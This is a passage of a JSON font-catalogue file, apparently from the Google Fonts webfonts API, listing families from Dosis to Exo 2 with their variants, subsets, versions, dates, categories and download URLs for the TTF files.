        "800": "http://fonts.gstatic.com/s/dosis/v18/HhyJU5sn9vOmLxNkIwRSjTVNWLEJt7QV3BkFTq4EPw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dr Sugiyama",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/drsugiyama/v10/HTxoL2k4N3O9n5I1boGI7abRM4-t-g7y.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Duru Sans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/durusans/v14/xn7iYH8xwmSyTvEV_HOxT_fYdN-WZw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Dynalight",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/dynalight/v9/1Ptsg8LOU_aOmQvTsF4ISotrDfGGxA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "EB Garamond",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v14",
      "lastModified": "2020-06-26",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-6_RUA4V-e6yHgQ.ttf",
        "500": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-2fRUA4V-e6yHgQ.ttf",
        "600": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-NfNUA4V-e6yHgQ.ttf",
        "700": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-DPNUA4V-e6yHgQ.ttf",
        "800": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-a_NUA4V-e6yHgQ.ttf",
        "italic": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7e8QI96WamXgXFI.ttf",
        "500italic": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7eOQI96WamXgXFI.ttf",
        "600italic": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7diR496WamXgXFI.ttf",
        "700italic": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7dbR496WamXgXFI.ttf",
        "800italic": "http://fonts.gstatic.com/s/ebgaramond/v14/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7c8R496WamXgXFI.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Eagle Lake",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/eaglelake/v8/ptRMTiqbbuNJDOiKj9wG5O7yKQNute8.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "East Sea Dokdo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/eastseadokdo/v8/xfuo0Wn2V2_KanASqXSZp22m05_aGavYS18y.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Eater",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/eater/v9/mtG04_FCK7bOvpu2u3FwsXsR.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Economica",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/economica/v8/Qw3fZQZaHCLgIWa29ZBrMcgAAl1lfQ.ttf",
        "italic": "http://fonts.gstatic.com/s/economica/v8/Qw3ZZQZaHCLgIWa29ZBbM8IEIFh1fWUl.ttf",
        "700": "http://fonts.gstatic.com/s/economica/v8/Qw3aZQZaHCLgIWa29ZBTjeckCnZ5dHw8iw.ttf",
        "700italic": "http://fonts.gstatic.com/s/economica/v8/Qw3EZQZaHCLgIWa29ZBbM_q4D3x9Vnksi4M7.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Eczar",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/eczar/v9/BXRlvF3Pi-DLmw0iBu9y8Hf0.ttf",
        "500": "http://fonts.gstatic.com/s/eczar/v9/BXRovF3Pi-DLmzXWL8t622v9WNjW.ttf",
        "600": "http://fonts.gstatic.com/s/eczar/v9/BXRovF3Pi-DLmzX6KMt622v9WNjW.ttf",
        "700": "http://fonts.gstatic.com/s/eczar/v9/BXRovF3Pi-DLmzWeKct622v9WNjW.ttf",
        "800": "http://fonts.gstatic.com/s/eczar/v9/BXRovF3Pi-DLmzWCKst622v9WNjW.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "El Messiri",
      "variants": [
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "arabic",
        "cyrillic",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/elmessiri/v8/K2F0fZBRmr9vQ1pHEey6AoqKAyLzfWo.ttf",
        "500": "http://fonts.gstatic.com/s/elmessiri/v8/K2F3fZBRmr9vQ1pHEey6On6jJyrYYWOMluQ.ttf",
        "600": "http://fonts.gstatic.com/s/elmessiri/v8/K2F3fZBRmr9vQ1pHEey6OlKkJyrYYWOMluQ.ttf",
        "700": "http://fonts.gstatic.com/s/elmessiri/v8/K2F3fZBRmr9vQ1pHEey6OjalJyrYYWOMluQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Electrolize",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/electrolize/v9/cIf5Ma1dtE0zSiGSiED7AUEGso5tQafB.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Elsie",
      "variants": [
        "regular",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/elsie/v10/BCanqZABrez54yYu9slAeLgX.ttf",
        "900": "http://fonts.gstatic.com/s/elsie/v10/BCaqqZABrez54x6q2-1IU6QeXSBk.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Elsie Swash Caps",
      "variants": [
        "regular",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/elsieswashcaps/v9/845DNN8xGZyVX5MVo_upKf7KnjK0ferVKGWsUo8.ttf",
        "900": "http://fonts.gstatic.com/s/elsieswashcaps/v9/845ENN8xGZyVX5MVo_upKf7KnjK0RW74DG2HToawrdU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Emblema One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/emblemaone/v9/nKKT-GQ0F5dSY8vzG0rOEIRBHl57G_f_.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Emilys Candy",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/emilyscandy/v8/2EbgL-1mD1Rnb0OGKudbk0y5r9xrX84JjA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Encode Sans",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v7",
      "lastModified": "2020-07-29",
      "files": {
        "100": "http://fonts.gstatic.com/s/encodesans/v7/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGGHiZtWP7FJCt2c.ttf",
        "200": "http://fonts.gstatic.com/s/encodesans/v7/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGOHjZtWP7FJCt2c.ttf",
        "300": "http://fonts.gstatic.com/s/encodesans/v7/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGD_jZtWP7FJCt2c.ttf",
        "regular": "http://fonts.gstatic.com/s/encodesans/v7/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGGHjZtWP7FJCt2c.ttf",
        "500": "http://fonts.gstatic.com/s/encodesans/v7/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGFPjZtWP7FJCt2c.ttf",
        "600": "http://fonts.gstatic.com/s/encodesans/v7/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGL_kZtWP7FJCt2c.ttf",
        "700": "http://fonts.gstatic.com/s/encodesans/v7/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGIbkZtWP7FJCt2c.ttf",
        "800": "http://fonts.gstatic.com/s/encodesans/v7/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGOHkZtWP7FJCt2c.ttf",
        "900": "http://fonts.gstatic.com/s/encodesans/v7/LDIcapOFNxEwR-Bd1O9uYNmnUQomAgE25imKSbHhROjLsZBWTSrQGMjkZtWP7FJCt2c.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Encode Sans Condensed",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/encodesanscondensed/v5/j8_76_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-5a-JLQoFI2KR.ttf",
        "200": "http://fonts.gstatic.com/s/encodesanscondensed/v5/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-SY6pByQJKnuIFA.ttf",
        "300": "http://fonts.gstatic.com/s/encodesanscondensed/v5/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-LY2pByQJKnuIFA.ttf",
        "regular": "http://fonts.gstatic.com/s/encodesanscondensed/v5/j8_16_LD37rqfuwxyIuaZhE6cRXOLtm2gfTGgaWNDw8VIw.ttf",
        "500": "http://fonts.gstatic.com/s/encodesanscondensed/v5/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-dYypByQJKnuIFA.ttf",
        "600": "http://fonts.gstatic.com/s/encodesanscondensed/v5/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-WYupByQJKnuIFA.ttf",
        "700": "http://fonts.gstatic.com/s/encodesanscondensed/v5/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-PYqpByQJKnuIFA.ttf",
        "800": "http://fonts.gstatic.com/s/encodesanscondensed/v5/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-IYmpByQJKnuIFA.ttf",
        "900": "http://fonts.gstatic.com/s/encodesanscondensed/v5/j8_46_LD37rqfuwxyIuaZhE6cRXOLtm2gfT-BYipByQJKnuIFA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Encode Sans Expanded",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/encodesansexpanded/v5/c4mx1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpJGKQNicoAbJlw.ttf",
        "200": "http://fonts.gstatic.com/s/encodesansexpanded/v5/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpLqCCNIXIwSP0XD.ttf",
        "300": "http://fonts.gstatic.com/s/encodesansexpanded/v5/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKOCyNIXIwSP0XD.ttf",
        "regular": "http://fonts.gstatic.com/s/encodesansexpanded/v5/c4m_1mF4GcnstG_Jh1QH6ac4hNLeNyeYUqoiIwdAd5Ab.ttf",
        "500": "http://fonts.gstatic.com/s/encodesansexpanded/v5/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpLWCiNIXIwSP0XD.ttf",
        "600": "http://fonts.gstatic.com/s/encodesansexpanded/v5/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpL6DSNIXIwSP0XD.ttf",
        "700": "http://fonts.gstatic.com/s/encodesansexpanded/v5/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKeDCNIXIwSP0XD.ttf",
        "800": "http://fonts.gstatic.com/s/encodesansexpanded/v5/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKCDyNIXIwSP0XD.ttf",
        "900": "http://fonts.gstatic.com/s/encodesansexpanded/v5/c4mw1mF4GcnstG_Jh1QH6ac4hNLeNyeYUpKmDiNIXIwSP0XD.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Encode Sans Semi Condensed",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/encodesanssemicondensed/v5/3qT6oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1T19MFtQ9jpVUA.ttf",
        "200": "http://fonts.gstatic.com/s/encodesanssemicondensed/v5/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1RZ1eFHbdTgTFmr.ttf",
        "300": "http://fonts.gstatic.com/s/encodesanssemicondensed/v5/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Q91uFHbdTgTFmr.ttf",
        "regular": "http://fonts.gstatic.com/s/encodesanssemicondensed/v5/3qT4oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG2yR_sVPRsjp.ttf",
        "500": "http://fonts.gstatic.com/s/encodesanssemicondensed/v5/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Rl1-FHbdTgTFmr.ttf",
        "600": "http://fonts.gstatic.com/s/encodesanssemicondensed/v5/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1RJ0OFHbdTgTFmr.ttf",
        "700": "http://fonts.gstatic.com/s/encodesanssemicondensed/v5/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Qt0eFHbdTgTFmr.ttf",
        "800": "http://fonts.gstatic.com/s/encodesanssemicondensed/v5/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1Qx0uFHbdTgTFmr.ttf",
        "900": "http://fonts.gstatic.com/s/encodesanssemicondensed/v5/3qT7oiKqnDuUtQUEHMoXcmspmy55SFWrXFRp9FTOG1QV0-FHbdTgTFmr.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Encode Sans Semi Expanded",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/encodesanssemiexpanded/v6/ke8xOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM-41KwrlKXeOEA.ttf",
        "200": "http://fonts.gstatic.com/s/encodesanssemiexpanded/v6/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM0IUCyDLJX6XCWU.ttf",
        "300": "http://fonts.gstatic.com/s/encodesanssemiexpanded/v6/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMyYXCyDLJX6XCWU.ttf",
        "regular": "http://fonts.gstatic.com/s/encodesanssemiexpanded/v6/ke83OhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TC4o_LyjgOXc.ttf",
        "500": "http://fonts.gstatic.com/s/encodesanssemiexpanded/v6/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM34WCyDLJX6XCWU.ttf",
        "600": "http://fonts.gstatic.com/s/encodesanssemiexpanded/v6/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TM1IRCyDLJX6XCWU.ttf",
        "700": "http://fonts.gstatic.com/s/encodesanssemiexpanded/v6/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMzYQCyDLJX6XCWU.ttf",
        "800": "http://fonts.gstatic.com/s/encodesanssemiexpanded/v6/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMyoTCyDLJX6XCWU.ttf",
        "900": "http://fonts.gstatic.com/s/encodesanssemiexpanded/v6/ke8yOhAPMEZs-BDuzwftTNJ85JvwMOzE9d9Cca5TMw4SCyDLJX6XCWU.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Engagement",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/engagement/v10/x3dlckLDZbqa7RUs9MFVXNossybsHQI.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Englebert",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/englebert/v8/xn7iYH8w2XGrC8AR4HSxT_fYdN-WZw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Enriqueta",
      "variants": [
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/enriqueta/v10/goksH6L7AUFrRvV44HVTS0CjkP1Yog.ttf",
        "500": "http://fonts.gstatic.com/s/enriqueta/v10/gokpH6L7AUFrRvV44HVrv2mHmNZEq6TTFw.ttf",
        "600": "http://fonts.gstatic.com/s/enriqueta/v10/gokpH6L7AUFrRvV44HVrk26HmNZEq6TTFw.ttf",
        "700": "http://fonts.gstatic.com/s/enriqueta/v10/gokpH6L7AUFrRvV44HVr92-HmNZEq6TTFw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Epilogue",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/epilogue/v2/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDLiDJXVigHPVA.ttf",
        "200": "http://fonts.gstatic.com/s/epilogue/v2/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDPiDJXVigHPVA.ttf",
        "300": "http://fonts.gstatic.com/s/epilogue/v2/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXbjPiDJXVigHPVA.ttf",
        "regular": "http://fonts.gstatic.com/s/epilogue/v2/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXMDPiDJXVigHPVA.ttf",
        "500": "http://fonts.gstatic.com/s/epilogue/v2/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXAjPiDJXVigHPVA.ttf",
        "600": "http://fonts.gstatic.com/s/epilogue/v2/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX7jTiDJXVigHPVA.ttf",
        "700": "http://fonts.gstatic.com/s/epilogue/v2/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX1zTiDJXVigHPVA.ttf",
        "800": "http://fonts.gstatic.com/s/epilogue/v2/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXsDTiDJXVigHPVA.ttf",
        "900": "http://fonts.gstatic.com/s/epilogue/v2/O4ZMFGj5hxF0EhjimngomvnCCtqb30OXmTTiDJXVigHPVA.ttf",
        "100italic": "http://fonts.gstatic.com/s/epilogue/v2/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKTp_RqATfVHNU.ttf",
        "200italic": "http://fonts.gstatic.com/s/epilogue/v2/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKT5_RqATfVHNU.ttf",
        "300italic": "http://fonts.gstatic.com/s/epilogue/v2/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HBUT5_RqATfVHNU.ttf",
        "italic": "http://fonts.gstatic.com/s/epilogue/v2/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HAKT5_RqATfVHNU.ttf",
        "500italic": "http://fonts.gstatic.com/s/epilogue/v2/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HA4T5_RqATfVHNU.ttf",
        "600italic": "http://fonts.gstatic.com/s/epilogue/v2/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDUSJ_RqATfVHNU.ttf",
        "700italic": "http://fonts.gstatic.com/s/epilogue/v2/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HDtSJ_RqATfVHNU.ttf",
        "800italic": "http://fonts.gstatic.com/s/epilogue/v2/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCKSJ_RqATfVHNU.ttf",
        "900italic": "http://fonts.gstatic.com/s/epilogue/v2/O4ZCFGj5hxF0EhjimlIhqAYaY7EBcUSC-HCjSJ_RqATfVHNU.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Erica One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ericaone/v11/WBLnrEXccV9VGrOKmGD1W0_MJMGxiQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Esteban",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/esteban/v9/r05bGLZE-bdGdN-GdOuD5jokU8E.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Euphoria Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/euphoriascript/v9/mFTpWb0X2bLb_cx6To2B8GpKoD5ak_ZT1D8x7Q.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ewert",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ewert/v8/va9I4kzO2tFODYBvS-J3kbDP.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Exo",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v11",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/exo/v11/4UaZrEtFpBI4f1ZSIK9d4LjJ4lM2CwNsOl4p5Is.ttf",
        "200": "http://fonts.gstatic.com/s/exo/v11/4UaZrEtFpBI4f1ZSIK9d4LjJ4tM3CwNsOl4p5Is.ttf",
        "300": "http://fonts.gstatic.com/s/exo/v11/4UaZrEtFpBI4f1ZSIK9d4LjJ4g03CwNsOl4p5Is.ttf",
        "regular": "http://fonts.gstatic.com/s/exo/v11/4UaZrEtFpBI4f1ZSIK9d4LjJ4lM3CwNsOl4p5Is.ttf",
        "500": "http://fonts.gstatic.com/s/exo/v11/4UaZrEtFpBI4f1ZSIK9d4LjJ4mE3CwNsOl4p5Is.ttf",
        "600": "http://fonts.gstatic.com/s/exo/v11/4UaZrEtFpBI4f1ZSIK9d4LjJ4o0wCwNsOl4p5Is.ttf",
        "700": "http://fonts.gstatic.com/s/exo/v11/4UaZrEtFpBI4f1ZSIK9d4LjJ4rQwCwNsOl4p5Is.ttf",
        "800": "http://fonts.gstatic.com/s/exo/v11/4UaZrEtFpBI4f1ZSIK9d4LjJ4tMwCwNsOl4p5Is.ttf",
        "900": "http://fonts.gstatic.com/s/exo/v11/4UaZrEtFpBI4f1ZSIK9d4LjJ4vowCwNsOl4p5Is.ttf",
        "100italic": "http://fonts.gstatic.com/s/exo/v11/4UafrEtFpBISdmSt-MY2ehbO95t040FmPnws9Iu-uA.ttf",
        "200italic": "http://fonts.gstatic.com/s/exo/v11/4UafrEtFpBISdmSt-MY2ehbO95t0Y0BmPnws9Iu-uA.ttf",
        "300italic": "http://fonts.gstatic.com/s/exo/v11/4UafrEtFpBISdmSt-MY2ehbO95t0vUBmPnws9Iu-uA.ttf",
        "italic": "http://fonts.gstatic.com/s/exo/v11/4UafrEtFpBISdmSt-MY2ehbO95t040BmPnws9Iu-uA.ttf",
        "500italic": "http://fonts.gstatic.com/s/exo/v11/4UafrEtFpBISdmSt-MY2ehbO95t00UBmPnws9Iu-uA.ttf",
        "600italic": "http://fonts.gstatic.com/s/exo/v11/4UafrEtFpBISdmSt-MY2ehbO95t0PUdmPnws9Iu-uA.ttf",
        "700italic": "http://fonts.gstatic.com/s/exo/v11/4UafrEtFpBISdmSt-MY2ehbO95t0BEdmPnws9Iu-uA.ttf",
        "800italic": "http://fonts.gstatic.com/s/exo/v11/4UafrEtFpBISdmSt-MY2ehbO95t0Y0dmPnws9Iu-uA.ttf",
        "900italic": "http://fonts.gstatic.com/s/exo/v11/4UafrEtFpBISdmSt-MY2ehbO95t0SkdmPnws9Iu-uA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Exo 2",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v9",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/exo2/v9/7cH1v4okm5zmbvwkAx_sfcEuiD8jvvOcPtq-rpvLpQ.ttf",
        "200": "http://fonts.gstatic.com/s/exo2/v9/7cH1v4okm5zmbvwkAx_sfcEuiD8jPvKcPtq-rpvLpQ.ttf",
        "300": "http://fonts.gstatic.com/s/exo2/v9/7cH1v4okm5zmbvwkAx_sfcEuiD8j4PKcPtq-rpvLpQ.ttf",
        "regular": "http://fonts.gstatic.com/s/exo2/v9/7cH1v4okm5zmbvwkAx_sfcEuiD8jvvKcPtq-rpvLpQ.ttf",
        "500": "http://fonts.gstatic.com/s/exo2/v9/7cH1v4okm5zmbvwkAx_sfcEuiD8jjPKcPtq-rpvLpQ.ttf",
